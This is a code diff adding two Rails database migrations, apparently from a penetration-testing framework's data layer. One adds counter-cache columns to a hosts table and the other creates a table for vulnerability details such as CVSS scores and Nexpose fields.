+		WebVuln.reset_column_information
 	end
 end

data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb

@@ -0,0 +1,21 @@
+class AddCounterCachesToHosts < ActiveRecord::Migration
+
+  def self.up
+    add_column :hosts, :note_count, :integer, :default => 0
+    add_column :hosts, :vuln_count, :integer, :default => 0
+    add_column :hosts, :service_count, :integer, :default => 0
+  
+    Mdm::Host.reset_column_information
+    Mdm::Host.all.each do |h|
+      Mdm::Host.reset_counters h.id, :notes
+      Mdm::Host.reset_counters h.id, :vulns
+      Mdm::Host.reset_counters h.id, :services
+    end
+  end
+
+  def self.down
+    remove_column :hosts, :note_count
+    remove_column :hosts, :vuln_count
+    remove_column :hosts, :service_count
+  end
+end

data/sql/migrate/20120625000000_add_vuln_details.rb

@@ -0,0 +1,34 @@
+class AddVulnDetails < ActiveRecord::Migration
+
+	def self.up
+		create_table :vuln_details do |t|
+			t.integer   :vuln_id     # Vuln table reference
+			t.float		:cvss_score  # 0.0 to 10.0
+			t.string	:cvss_vector # Ex: (AV:N/AC:L/Au:N/C:C/I:C/A:C)(AV:N/AC:L/Au:N/C:C/I:C/A:C)
+
+			t.string	:title       # Short identifier
+			t.text		:description # Plain text or HTML (trusted)
+			t.text		:solution    # Plain text or HTML (trusted)
+			t.binary	:proof       # Should be UTF-8, but may not be, sanitize on output
+						             # Technically this duplicates vuln.info, but that field
+						             # is poorly managed / handled today. Eventually we will
+						             # replace vuln.info
+
+			# Nexpose-specific fields
+			t.integer	:nx_console_id   # NexposeConsole table reference
+			t.integer	:nx_device_id    # Reference from the Nexpose side
+			t.string	:nx_vuln_id      # 'jre-java-update-flaw'
+			t.float		:nx_severity     # 0-10
+			t.float		:nx_pci_severity # 0-10
+			t.timestamp	:nx_published    # Normalized from "20081205T000000000"
+			t.timestamp	:nx_added        # Normalized from "20081205T000000000"
+			t.timestamp	:nx_modified     # Normalized from "20081205T000000000"
+			t.text		:nx_tags         # Comma separated
+	
+		end
+	end
+
+	def self.down
+		drop_table :vuln_details
+	end
+end